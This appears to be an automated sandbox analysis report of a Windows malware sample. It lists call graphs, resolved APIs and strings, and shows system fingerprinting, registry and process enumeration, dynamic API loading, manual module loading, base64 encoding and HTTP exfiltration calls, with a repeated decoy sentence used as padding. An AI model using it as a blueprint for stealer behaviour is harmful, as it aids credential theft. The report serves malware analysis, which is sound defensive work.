14801->14802 14803 3922c1 14802->14803 14804 39a8a0 lstrcpy 14803->14804 14805 3922ca 14804->14805 14806 39a9b0 4 API calls 14805->14806 14807 3922eb 14806->14807 14808 39a8a0 lstrcpy 14807->14808 14809 3922f4 14808->14809 15382 3987c0 14809->15382 14812 39a920 3 API calls 14813 39231e 14812->14813 14814 39a8a0 lstrcpy 14813->14814 14815 392327 14814->14815 14816 39a9b0 4 API calls 14815->14816 14817 392351 14816->14817 14818 39a8a0 lstrcpy 14817->14818 14819 39235a 14818->14819 14820 39a9b0 4 API calls 14819->14820 14821 39237a 14820->14821 14822 39a8a0 lstrcpy 14821->14822 14823 392383 14822->14823 14824 39a9b0 4 API calls 14823->14824 14825 3923a2 14824->14825 14826 39a8a0 lstrcpy 14825->14826 14827 3923ab 14826->14827 15387 3981f0 14827->15387 14829 3923c2 14830 39a920 3 API calls 14829->14830 14831 3923d5 14830->14831 14832 39a8a0 lstrcpy 14831->14832 14833 3923de 14832->14833 14834 39a9b0 4 API calls 14833->14834 14835 39240a 14834->14835 14836 39a8a0 lstrcpy 14835->14836 14837 392413 14836->14837 14838 39a9b0 4 API calls 14837->14838 14839 392432 14838->14839 14840 39a8a0 lstrcpy 14839->14840 14841 39243b 14840->14841 14842 39a9b0 4 API calls 14841->14842 14843 39245c 14842->14843 14844 39a8a0 lstrcpy 14843->14844 14845 392465 14844->14845 14846 39a9b0 4 API calls 14845->14846 14847 392484 14846->14847 14848 39a8a0 lstrcpy 14847->14848 14849 39248d 14848->14849 14850 39a9b0 4 API calls 14849->14850 14851 3924ae 14850->14851 14852 39a8a0 lstrcpy 14851->14852 14853 3924b7 14852->14853 15395 398320 14853->15395 14855 3924d3 14856 39a920 3 API calls 14855->14856 14857 3924e6 14856->14857 14858 39a8a0 lstrcpy 14857->14858 14859 3924ef 14858->14859 14860 39a9b0 4 API calls 14859->14860 14861 392519 14860->14861 14862 39a8a0 lstrcpy 14861->14862 14863 392522 14862->14863 14864 39a9b0 4 API calls 14863->14864 14865 392543 14864->14865 14866 39a8a0 lstrcpy 14865->14866 14867 39254c 14866->14867 14868 398320 17 API calls 14867->14868 14869 392568 14868->14869 14870 39a920 3 API calls 14869->14870 14871 39257b 14870->14871 14872 39a8a0 lstrcpy 14871->14872 14873 392584 14872->14873 14874 39a9b0 4 API calls 14873->14874 14875 3925ae 14874->14875 14876 39a8a0 lstrcpy 14875->14876 14877 3925b7 14876->14877 14878 39a9b0 4 API calls 14877->14878 14879 3925d6 14878->14879 14880 39a8a0 lstrcpy 14879->14880 14881 3925df 14880->14881 14882 39a9b0 4 API calls 14881->14882 14883 392600 14882->14883 14884 39a8a0 lstrcpy 14883->14884 14885 392609 14884->14885 15431 398680 14885->15431 14887 392620 14888 39a920 3 API calls 14887->14888 14889 392633 14888->14889 14890 39a8a0 lstrcpy 14889->14890 14891 39263c 14890->14891 14892 39265a lstrlen 14891->14892 14893 39266a 14892->14893 14894 39a740 lstrcpy 14893->14894 14895 39267c 14894->14895 14896 381590 lstrcpy 14895->14896 14897 39268d 14896->14897 15441 395190 14897->15441 14899 392699 14899->13331 15629 39aad0 14900->15629 14902 385009 InternetOpenUrlA 14906 385021 14902->14906 14903 38502a InternetReadFile 14903->14906 14904 3850a0 InternetCloseHandle InternetCloseHandle 14905 3850ec 14904->14905 14905->13335 14906->14903 14906->14904 15630 3898d0 14907->15630 14909 390759 14910 390a38 14909->14910 14911 39077d 14909->14911 14912 381590 lstrcpy 14910->14912 14914 390799 StrCmpCA 14911->14914 14913 390a49 14912->14913 15806 390250 14913->15806 14916 3907a8 14914->14916 14940 390843 14914->14940 14918 39a7a0 lstrcpy 14916->14918 14920 3907c3 14918->14920 14919 390865 StrCmpCA 14921 390874 14919->14921 14959 39096b 14919->14959 14922 381590 lstrcpy 14920->14922 14923 39a740 lstrcpy 14921->14923 14924 39080c 14922->14924 14926 390881 14923->14926 14927 39a7a0 lstrcpy 14924->14927 14925 39099c StrCmpCA 14928 3909ab 14925->14928 14948 390a2d 14925->14948 14929 39a9b0 4 API calls 14926->14929 14930 390823 14927->14930 14931 381590 lstrcpy 14928->14931 14932 3908ac 14929->14932 14933 39a7a0 lstrcpy 14930->14933 14934 3909f4 14931->14934 14935 39a920 3 API calls 14932->14935 14936 39083e 14933->14936 14937 39a7a0 lstrcpy 14934->14937 14938 3908b3 14935->14938 15633 38fb00 14936->15633 14941 390a0d 14937->14941 14942 39a9b0 4 API calls 14938->14942 14940->14919 14943 39a7a0 lstrcpy 14941->14943 14944 3908ba 14942->14944 14945 390a28 14943->14945 14946 39a8a0 lstrcpy 14944->14946 15749 390030 14945->15749 14948->13339 14959->14925 15281 39a7a0 lstrcpy 15280->15281 15282 381683 15281->15282 15283 39a7a0 lstrcpy 15282->15283 15284 381695 15283->15284 15285 39a7a0 lstrcpy 15284->15285 15286 3816a7 15285->15286 15287 39a7a0 lstrcpy 15286->15287 15288 3815a3 15287->15288 15288->14162 15290 3847c6 15289->15290 15291 384838 lstrlen 15290->15291 15315 39aad0 15291->15315 15293 384848 InternetCrackUrlA 15294 384867 15293->15294 15294->14239 15296 39a740 lstrcpy 15295->15296 15297 398b74 15296->15297 15298 39a740 lstrcpy 15297->15298 15299 398b82 GetSystemTime 15298->15299 15300 398b99 15299->15300 15301 39a7a0 lstrcpy 15300->15301 15302 398bfc 15301->15302 15302->14254 15304 39a931 15303->15304 15305 39a988 15304->15305 15307 39a968 lstrcpy lstrcat 15304->15307 15306 39a7a0 lstrcpy 15305->15306 15308 39a994 15306->15308 15307->15305 15308->14257 15309->14372 15311 389af9 LocalAlloc 15310->15311 15312 384eee 15310->15312 15311->15312 15313 389b14 CryptStringToBinaryA 15311->15313 15312->14260 15312->14262 15313->15312 15314 389b39 LocalFree 15313->15314 15314->15312 15315->15293 15316->14382 15317->14523 15318->14525 15319->14533 15448 3977a0 15320->15448 15323 3976c6 RegOpenKeyExA 15324 397704 RegCloseKey 15323->15324 15325 3976e7 RegQueryValueExA 15323->15325 15326 391c1e 15324->15326 15325->15324 15326->14615 15328 391c99 15327->15328 15328->14629 15330 391e09 15329->15330 15330->14671 15332 397a9a wsprintfA 15331->15332 15333 391e84 15331->15333 15332->15333 15333->14685 15335 397b4d 15334->15335 15337 391efe 15334->15337 15455 398d20 LocalAlloc CharToOemW 15335->15455 15337->14699 15339 39a740 lstrcpy 15338->15339 15340 397bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15339->15340 15349 397c25 15340->15349 15341 397d18 15343 397d28 15341->15343 15344 397d1e LocalFree 15341->15344 15342 397c46 GetLocaleInfoA 15342->15349 15346 39a7a0 lstrcpy 15343->15346 15344->15343 15345 39a9b0 lstrcpy lstrlen lstrcpy lstrcat 15345->15349 15348 397d37 15346->15348 15347 39a8a0 lstrcpy 15347->15349 15348->14712 15349->15341 15349->15342 15349->15345 15349->15347 15351 392008 15350->15351 15351->14727 15353 399493 GetModuleFileNameExA CloseHandle 15352->15353 15354 3994b5 15352->15354 15353->15354 15355 39a740 lstrcpy 15354->15355 15356 392091 15355->15356 15356->14742 15358 397e68 RegQueryValueExA 15357->15358 15359 392119 15357->15359 15360 397e8e RegCloseKey 15358->15360 15359->14756 15360->15359 15362 397fb9 GetLogicalProcessorInformationEx 15361->15362 15363 397fd8 GetLastError 15362->15363 15369 398029 15362->15369 15364 398022 15363->15364 15373 397fe3 15363->15373 15365 392194 15364->15365 15368 3989f0 2 API calls 15364->15368 15365->14770 15368->15365 15370 3989f0 2 API calls 15369->15370 15371 39807b 15370->15371 15371->15364 15372 398084 wsprintfA 15371->15372 15372->15365 15373->15362 15373->15365 15456 3989f0 15373->15456 15459 398a10 GetProcessHeap RtlAllocateHeap 15373->15459 15375 39220f 15374->15375 15375->14784 15377 3989b0 15376->15377 15378 39814d GlobalMemoryStatusEx 15377->15378 15381 398163 __aulldiv 15378->15381 15379 39819b wsprintfA 15380 392289 15379->15380 15380->14798 15381->15379 15383 3987fb GetProcessHeap RtlAllocateHeap wsprintfA 15382->15383 15385 39a740 lstrcpy 15383->15385 15386 39230b 15385->15386 15386->14812 15388 39a740 lstrcpy 15387->15388 15394 398229 15388->15394 15389 398263 15390 39a7a0 lstrcpy 15389->15390 15392 3982dc 15390->15392 15391 39a9b0 lstrcpy lstrlen lstrcpy lstrcat 15391->15394 15392->14829 15393 39a8a0 lstrcpy 15393->15394 15394->15389 15394->15391 15394->15393 15396 39a740 lstrcpy 15395->15396 15397 39835c RegOpenKeyExA 15396->15397 15398 3983ae 15397->15398 15399 3983d0 15397->15399 15400 39a7a0 lstrcpy 15398->15400 15401 3983f8 RegEnumKeyExA 15399->15401 15402 398613 RegCloseKey 15399->15402 15411 3983bd 15400->15411 15403 39843f wsprintfA RegOpenKeyExA 15401->15403 15404 39860e 15401->15404 15405 39a7a0 lstrcpy 15402->15405 15406 3984c1 RegQueryValueExA 15403->15406 15407 398485 RegCloseKey RegCloseKey 15403->15407 15404->15402 15405->15411 15409 3984fa lstrlen 15406->15409 15410 398601 RegCloseKey 15406->15410 15408 39a7a0 lstrcpy 15407->15408 15408->15411 15409->15410 15412 398510 15409->15412 15410->15404 15411->14855 15413 39a9b0 4 API calls 15412->15413 15414 398527 15413->15414 15415 39a8a0 lstrcpy 15414->15415 15416 398533 15415->15416 15417 39a9b0 4 API calls 15416->15417 15418 398557 15417->15418 15419 39a8a0 lstrcpy 15418->15419 15420 398563 15419->15420 15421 39856e RegQueryValueExA 15420->15421 15421->15410 15422 3985a3 15421->15422 15423 39a9b0 4 API calls 15422->15423 15424 3985ba 15423->15424 15425 39a8a0 lstrcpy 15424->15425 15426 3985c6 15425->15426 15427 39a9b0 4 API calls 15426->15427 15428 3985ea 15427->15428 15429 39a8a0 lstrcpy 15428->15429 15430 3985f6 15429->15430 15430->15410 15432 39a740 lstrcpy 15431->15432 15433 3986bc CreateToolhelp32Snapshot Process32First 15432->15433 15434 3986e8 Process32Next 15433->15434 15435 39875d CloseHandle 15433->15435 15434->15435 15440 3986fd 15434->15440 15436 39a7a0 lstrcpy 15435->15436 15439 398776 15436->15439 15437 39a9b0 lstrcpy lstrlen lstrcpy lstrcat 15437->15440 15438 39a8a0 lstrcpy 15438->15440 15439->14887 15440->15434 15440->15437 15440->15438 15442 39a7a0 lstrcpy 15441->15442 15443 3951b5 15442->15443 15444 381590 lstrcpy 15443->15444 15445 3951c6 15444->15445 15460 385100 15445->15460 15447 3951cf 15447->14899 15451 397720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15448->15451 15450 3976b9 15450->15323 15450->15326 15452 397780 RegCloseKey 15451->15452 15453 397765 RegQueryValueExA 15451->15453 15454 397793 15452->15454 15453->15452 15454->15450 15455->15337 15457 3989f9 GetProcessHeap HeapFree 15456->15457 15458 398a0c 15456->15458 15457->15458 15458->15373 15459->15373 15461 39a7a0 lstrcpy 15460->15461 15462 385119 15461->15462 15463 3847b0 2 API calls 15462->15463 15464 385125 15463->15464 15620 398ea0 15464->15620 15466 385184 15467 385192 lstrlen 15466->15467 15468 3851a5 15467->15468 15469 398ea0 4 API calls 15468->15469 15470 3851b6 15469->15470 15471 39a740 lstrcpy 15470->15471 15472 3851c9 15471->15472 15473 39a740 lstrcpy 15472->15473 15474 3851d6 15473->15474 15475 39a740 lstrcpy 15474->15475 15476 3851e3 15475->15476 15477 39a740 lstrcpy 15476->15477 15478 3851f0 15477->15478 15479 39a740 lstrcpy 15478->15479 15480 3851fd InternetOpenA StrCmpCA 15479->15480 15481 38522f 15480->15481 15482 3858c4 InternetCloseHandle 15481->15482 15483 398b60 3 API calls 15481->15483 15489 3858d9 ctype 15482->15489 15484 38524e 15483->15484 15485 39a920 3 API calls 15484->15485 15486 385261 15485->15486 15487 39a8a0 lstrcpy 15486->15487 15488 38526a 15487->15488 15490 39a9b0 4 API calls 15488->15490 15493 39a7a0 lstrcpy 15489->15493 15491 3852ab 15490->15491 15492 39a920 3 API calls 15491->15492 15494 3852b2 15492->15494 15501 385913 15493->15501 15495 39a9b0 4 API calls 15494->15495 15496 3852b9 15495->15496 15497 39a8a0 lstrcpy 15496->15497 15498 3852c2 15497->15498 15499 39a9b0 4 API calls 15498->15499 15500 385303 15499->15500 15502 39a920 3 API calls 15500->15502 15501->15447 15503 38530a 15502->15503 15504 39a8a0 lstrcpy 15503->15504 15505 385313 15504->15505 15506 385329 InternetConnectA 15505->15506 15506->15482 15507 385359 HttpOpenRequestA 15506->15507 15509 3858b7 InternetCloseHandle 15507->15509 15510 3853b7 15507->15510 15509->15482 15511 39a9b0 4 API calls 15510->15511 15512 3853cb 15511->15512 15513 39a8a0 lstrcpy 15512->15513 15514 3853d4 15513->15514 15515 39a920 3 API calls 15514->15515 15516 3853f2 15515->15516 15517 39a8a0 lstrcpy 15516->15517 15518 3853fb 15517->15518 15519 39a9b0 4 API calls 15518->15519 15520 38541a 15519->15520 15521 39a8a0 lstrcpy 15520->15521 15522 385423 15521->15522 15523 39a9b0 4 API calls 15522->15523 15524 385444 15523->15524 15525 39a8a0 lstrcpy 15524->15525 15526 38544d 15525->15526 15527 39a9b0 4 API calls 15526->15527 15528 38546e 15527->15528 15529 39a8a0 lstrcpy 15528->15529 15621 398ead CryptBinaryToStringA 15620->15621 15625 398ea9 15620->15625 15622 398ece GetProcessHeap RtlAllocateHeap 15621->15622 15621->15625 15623 398ef4 ctype 15622->15623 15622->15625 15624 398f05 CryptBinaryToStringA 15623->15624 15624->15625 15625->15466 15629->14902 15872 389880 15630->15872 15632 3898e1 15632->14909 15634 39a740 lstrcpy 15633->15634 15635 38fb16 15634->15635 15807 39a740 lstrcpy 15806->15807 15808 390266 15807->15808 15809 398de0 2 API calls 15808->15809 15810 39027b 15809->15810 15811 39a920 3 API calls 15810->15811 15812 39028b 15811->15812 15813 39a8a0 lstrcpy 15812->15813 15814 390294 15813->15814 15815 39a9b0 4 API calls 15814->15815 15816 3902b8 15815->15816 15873 38988e 15872->15873 15876 386fb0 15873->15876 15875 3898ad ctype 15875->15632 15879 386d40 15876->15879 15880 386d63 15879->15880 15887 386d59 15879->15887 15880->15887 15893 386660 15880->15893 15882 386dbe 15882->15887 15899 3869b0 15882->15899 15884 386e2a 15885 386ee6 VirtualFree 15884->15885 15884->15887 15888 386ef7 15884->15888 15885->15888 15886 386f41 15886->15887 15889 3989f0 2 API calls 15886->15889 15887->15875 15888->15886 15890 386f38 15888->15890 15891 386f26 FreeLibrary 15888->15891 15889->15887 15892 3989f0 2 API calls 15890->15892 15891->15888 15892->15886 15898 38668f VirtualAlloc 15893->15898 15895 386730 15896 38673c 15895->15896 15897 386743 VirtualAlloc 15895->15897 15896->15882 15897->15896 15898->15895 15898->15896 15900 3869c9 15899->15900 15904 3869d5 15899->15904 15901 386a09 LoadLibraryA 15900->15901 15900->15904 15902 386a32 15901->15902 15901->15904 15906 386ae0 15902->15906 15909 398a10 GetProcessHeap RtlAllocateHeap 15902->15909 15904->15884 15905 386ba8 GetProcAddress 15905->15904 15905->15906 15906->15904 15906->15905 15907 3989f0 2 API calls 15907->15906 15908 386a8b 15908->15904 15908->15907 15909->15908

                          Executed Functions

                          Function 00399860 Relevance: 82.5, APIs: 33, Strings: 14, Instructions: 212libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 399860-399874 call 399750 663 39987a-399a8e call 399780 GetProcAddress * 21 660->663 664 399a93-399af2 LoadLibraryA * 5 660->664 663->664 666 399b0d-399b14 664->666 667 399af4-399b08 GetProcAddress 664->667 669 399b46-399b4d 666->669 670 399b16-399b41 GetProcAddress * 2 666->670 667->666 671 399b68-399b6f 669->671 672 399b4f-399b63 GetProcAddress 669->672 670->669 673 399b89-399b90 671->673 674 399b71-399b84 GetProcAddress 671->674 672->671 675 399bc1-399bc2 673->675 676 399b92-399bbc GetProcAddress * 2 673->676 674->673 676->675
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,00E324E8), ref: 003998A1
                          • GetProcAddress.KERNEL32(74DD0000,00E32440), ref: 003998BA
                          • GetProcAddress.KERNEL32(74DD0000,00E32248), ref: 003998D2
                          • GetProcAddress.KERNEL32(74DD0000,00E324A0), ref: 003998EA
                          • GetProcAddress.KERNEL32(74DD0000,00E322F0), ref: 00399903
                          • GetProcAddress.KERNEL32(74DD0000,00E38F68), ref: 0039991B
                          • GetProcAddress.KERNEL32(74DD0000,00E258D0), ref: 00399933
                          • GetProcAddress.KERNEL32(74DD0000,00E258B0), ref: 0039994C
                          • GetProcAddress.KERNEL32(74DD0000,00E32470), ref: 00399964
                          • GetProcAddress.KERNEL32(74DD0000,00E32260), ref: 0039997C
                          • GetProcAddress.KERNEL32(74DD0000,00E324D0), ref: 00399995
                          • GetProcAddress.KERNEL32(74DD0000,00E32500), ref: 003999AD
                          • GetProcAddress.KERNEL32(74DD0000,00E25910), ref: 003999C5
                          • GetProcAddress.KERNEL32(74DD0000,00E32278), ref: 003999DE
                          • GetProcAddress.KERNEL32(74DD0000,00E322A8), ref: 003999F6
                          • GetProcAddress.KERNEL32(74DD0000,00E25890), ref: 00399A0E
                          • GetProcAddress.KERNEL32(74DD0000,00E32308), ref: 00399A27
                          • GetProcAddress.KERNEL32(74DD0000,00E32320), ref: 00399A3F
                          • GetProcAddress.KERNEL32(74DD0000,00E25810), ref: 00399A57
                          • GetProcAddress.KERNEL32(74DD0000,00E32350), ref: 00399A70
                          • GetProcAddress.KERNEL32(74DD0000,00E25830), ref: 00399A88
                          • LoadLibraryA.KERNEL32(00E325A8,?,00396A00), ref: 00399A9A
                          • LoadLibraryA.KERNEL32(00E325C0,?,00396A00), ref: 00399AAB
                          • LoadLibraryA.KERNEL32(00E32560,?,00396A00), ref: 00399ABD
                          • LoadLibraryA.KERNEL32(00E325D8,?,00396A00), ref: 00399ACF
                          • LoadLibraryA.KERNEL32(00E32518,?,00396A00), ref: 00399AE0
                          • GetProcAddress.KERNEL32(75A70000,00E32548), ref: 00399B02
                          • GetProcAddress.KERNEL32(75290000,00E32530), ref: 00399B23
                          • GetProcAddress.KERNEL32(75290000,00E32578), ref: 00399B3B
                          • GetProcAddress.KERNEL32(75BD0000,00E32590), ref: 00399B5D
                          • GetProcAddress.KERNEL32(75450000,00E256B0), ref: 00399B7E
                          • GetProcAddress.KERNEL32(76E90000,00E390E8), ref: 00399B9F
                          • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00399BB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: #$0%$0X$@$$H"$H%$NtQueryInformationProcess$P#$`"$`%$p$$x"$x%$$
                          • API String ID: 2238633743-115596743
                          • Opcode ID: 0dbb15979f8127da16a89459921e5098375d8972816802c1c66fe9b0725fc3e3
                          • Instruction ID: 0afa8450dcb3e2371a29d91b22d20635bc77a6efdd8a56d5291d6a3c66bfd0f3
                          • Opcode Fuzzy Hash: 0dbb15979f8127da16a89459921e5098375d8972816802c1c66fe9b0725fc3e3
                          • Instruction Fuzzy Hash: 30A1BFB5500A489FD308EFA8FD88E563FF9F76C309704851AE605C3225D779984AFB16
                          Function 003845C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 3845c0-384695 RtlAllocateHeap 781 3846a0-3846a6 764->781 782 3846ac-38474a 781->782 783 38474f-3847a9 VirtualProtect 781->783 782->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0038460E
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0038479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384729
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer 